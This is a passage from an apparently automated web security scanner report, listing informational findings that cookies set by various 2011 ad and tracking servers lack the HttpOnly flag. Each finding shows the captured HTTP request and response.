The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; RMFD=011R4jGHO101yed8|O1021J7A; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J7A|O1021J7F; expires=Tue, 17-Sep-13 01:00:28 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1510
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/R
...[SNIP]...

12.121. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; RMFD=011R4jGHO101yed8|O1021J7A; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:27 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J7A; expires=Tue, 17-Sep-13 01:00:27 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 500
Content-Type: application/x-javascript

document.write ('<!-- begin ZEDO for channel: Herald Interactive - ROS , publisher: Herald Interactive , Ad Dimension: Pixel/Popup - 1 x 1 -->\n');
document.write ('<iframe src="http://d3.zedo.com/jsc
...[SNIP]...

12.122. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.9.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J3t|O2021J78|O2021J7A|O2021J7F|O20226Kk; expires=Tue, 17-Sep-13 01:02:10 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1491
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.co
...[SNIP]...

12.123. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.9.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:11 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; expires=Tue, 17-Sep-13 01:02:11 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3106
Content-Type: application/x-javascript

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('        \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

12.124. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F15%2Fmichaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc%2F&srcUrl=http%3A%2F%2Fwww.tmz.com%2Frss.xml&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=42206&ref=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers%2F%3Fadid%3Dhero2&apv=false&rand=0.5065516342874616&sig=ot4zziHw HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=7a957d2b-640c-464a-8acd-8219f3607c99; tick=1316220936567; _lvs2="7o9zvLIDBgZ/PDZJG4J4VcCxVx+pz+vfyPm975gFPm+3JT8CAr5BQAcO/CD2iJ2OomCz617Au40="; _lvd2="eMOLTpv1no2amRCwbsQHJs5ztY1Fx+rEq8YUDxVG3BP6hVox5+F4+/M7CxYsJDnxTURpOGo6ZNkZw69B7h6E1sMF0XSBEZRLE75RDxSwUMqkfVlejxXOILIvcogbdib9HJJKMWdu3/A="; _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; recs-6a9250000f8bdf31c8744c5bafc327c0="ZzAE/ktjesdeNFlXZ49FMhJVhafYPcPgLkUrQgKyP5dRrm2fnBRV2fSb/IdwA62N3ZxR/ggt50glYhkt69YxgNxTpgOHGlPC+xoCSjlRu8m0a3QZy00XGKvEjfibUWU69qJMoHFHxrJ5WOXcO9UcZQ=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1316220942842; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="7o9zvLIDBgZ/PDZJG4J4VcCxVx+pz+vfyPm975gFPm+3JT8CAr5BQAcO/CD2iJ2OomCz617Au40="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 13-Oct-2012 00:55:42 GMT; Path=/
Set-Cookie: _lvd2="PHPHrMMi4tB/TUzMDhNLuExtgrPUidZw2SkL41O19PL40iJ3cmuxL0CBz/AZPclyarqHKgLRZADwwyrf9Wxp503sC1vv7gThts/kVuXGq+6RePDwdpIv9I9eUye8TAoxesWFaLltsC0="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Fri, 23-Sep-2011 13:43:42 GMT; Path=/
Set-Cookie: _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 13-Oct-2012 00:55:42 GMT; Path=/
Set-Cookie: recs-6a9250000f8bdf31c8744c5bafc327c0="WOCZPPRgUVeQ3XCS2OoI48rf6g9SSjSCZlMhWyZJP/HjJ1nS2BO6WvFWNYQF78qoU+fNRUM+rQBZCc9A1uQeXHxeY8GsogNrScHQXkaR7ugqy2ogff13YSmXftEP5JyF9XVu3bYtlRJ5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sat, 17-Sep-2011 01:00:42 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:55:42 GMT
Content-Length: 8887

outbrain_rater.returnedOdbData({'response':{'exec_time':36,'status':{'id':0,'content':'Request succeeded'},'request':{'widgetJsId':'AR_1','did':'231534154','req_id':'da23b34cfa8657c71e50520363d1bbbe'}
...[SNIP]...

12.125. http://omg.yahoo.com/photos/what-were-they-thinking/5203  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /photos/what-were-they-thinking/5203

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /photos/what-were-they-thinking/5203 HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:58 GMT
Set-Cookie: D=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/; domain=.yahoo.com
Set-Cookie: B=8942vl5777rt6&b=3&s=hu; expires=Tue, 16-Sep-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 135006

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head profile="http://purl.org/NET/erdf/profile">

   <link rel="schema.celeb" href="http://omg.yahoo.co
...[SNIP]...

12.126. http://ping.crowdscience.com/ping.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fwww.bradsdeals.com%2Fdealsoftheday%2Fsubscribe%2Fb%3Ftid%3D306656%26s%3Dadcom%7Cdisplay%7Ccomscore55-300redmixr-b%26utm_source%3Dadcom%26utm_medium%3Ddisplay%26utm_content%3D300redmixr-b%26utm_campaign%3Dcomscore55&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1316239546152&c=0&t=0&v=0&m=0&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:36:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Fri, 16 Dec 2011 01:36:55; Path=/
Content-Length: 869
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=2e1725dcdf2570d7;path=/';
document.cookie = '__csv=2a31db5320bf2a6b|0;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('a71917903cb81aa6'!='1'
...[SNIP]...

12.127. http://q1.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adam/detect?cat=Boston_Herald.Entertainment.Front&page=18811660935170949&serial=1000:1:A&&LOC=http://bostonherald.com/entertainment/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=25668649072758853&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca; A=dvV7X9w4IV7MvENT06Sba; C=ohZ7X9wdIMXUcgaLa4OQ95t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:49 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: A=dvV7X9w5TX53vENT06Sba;Path=/;
Set-cookie: C=o0Z7X9wtT9UGdhaMa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:38:08 GMT;
Set-cookie: O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba;Path=/;Expires=Fri, 01-Feb-2075 04:38:08 GMT;
x-internal-browser: CH0
x-internal-id: 174574225/1248338003/1137740046/2570514078
x-internal-selected:
x-internal-data: TCPV<38664>,RMCPV<38664>,TCPV<29214>,RMCPV<29214>,TCPV<29211>,RMCPV<29211>,TCPV<29210>,RMCPV<29210>,TCPV<27351>,RMCPV<27351>,TCPV<0>,RMCPV<0>,CAVPV<38664 32 0>,CAVPV<38664 34 10>,CAVPV<38664 43 3>,CAVPV<38664 103 21>,CAVPV<38664 104 12>,CAVPV<38664 111 8>,CG:HDWMG<38664 116 225>,CAVPV<38664 116 225>,CG:HDWMG<29214 116 225>,CG:O<29211 116 225>,CG:O<29210 116 225>,CG:O<27351 116 225>,CG:O<0 116 225>,CG:HDWMG<38664 117 225024>,CAVPV<38664 117 225024>,CG:HDWMG<29214 117 225024>,CG:O<29211 117 225024>,CG:O<29210 117 225024>,CG:O<27351 117 225024>,CG:O<0 117 225024>,CAVPV<38664 118 1>,CAVPV<38664 120 4000000005>,CAVPV<38664 122 4225024005>,CAVPV<38664 280 22>,CAVPV<38664 282 0>,CAVPV<38664 283 0>
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 1431
Connection: close
Content-Type: application/javascript

...(function(){
var CM8CE = (window.CM8E && CM8E['Boston_Herald.Entertainment.Front']) || {};
var CM8CES = (CM8CE.serialsData && CM8CE.serialsData[1000]) || {};
if (CM8CE.requestReceived)
   CM8CE.requ
...[SNIP]...

12.128. http://q1.checkm8.com/adam/report  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://q1.checkm8.com
Path:   /adam/report

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:49:42 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.17 NY-AD7
Set-cookie: A=dvV7X9wIT1IVvENT06Sba;Path=/;
Set-cookie: C=osH9X9wtHI32cganb4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:02 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 158434447/1232198946/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


12.129. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=tOVyHE2zjqa_Ydc52bbPPZZwvhbYx5rMzWj3CcHWYCPg1CYfDyCzrunutgyaAqKDpg8RNvGAjmTSOdO0dh87wg&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15228%7C15234%7C15228%7C15228%7C15231; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Thu, 15-Mar-2012 01:10:21 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1311898&t=2
Content-Length: 0
Date: Sat, 17 Sep 2011 01:10:21 GMT


12.130. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC8z/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC8z/ HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27330&s=27331
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=2944787775510337379; rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15228%7C15234%7C15228%7C15228%7C15231; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Thu, 15-Mar-2012 01:00:32 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 17 Sep 2011 01:00:31 GMT

GIF89a.............!.......,...........D..;

12.131. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653? HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://bit.ly/n8AAWP
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:35:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 137
Date: Sat, 17 Sep 2011 01:35:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:35:29 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

<html><head><title>Object moved</title></head><body>
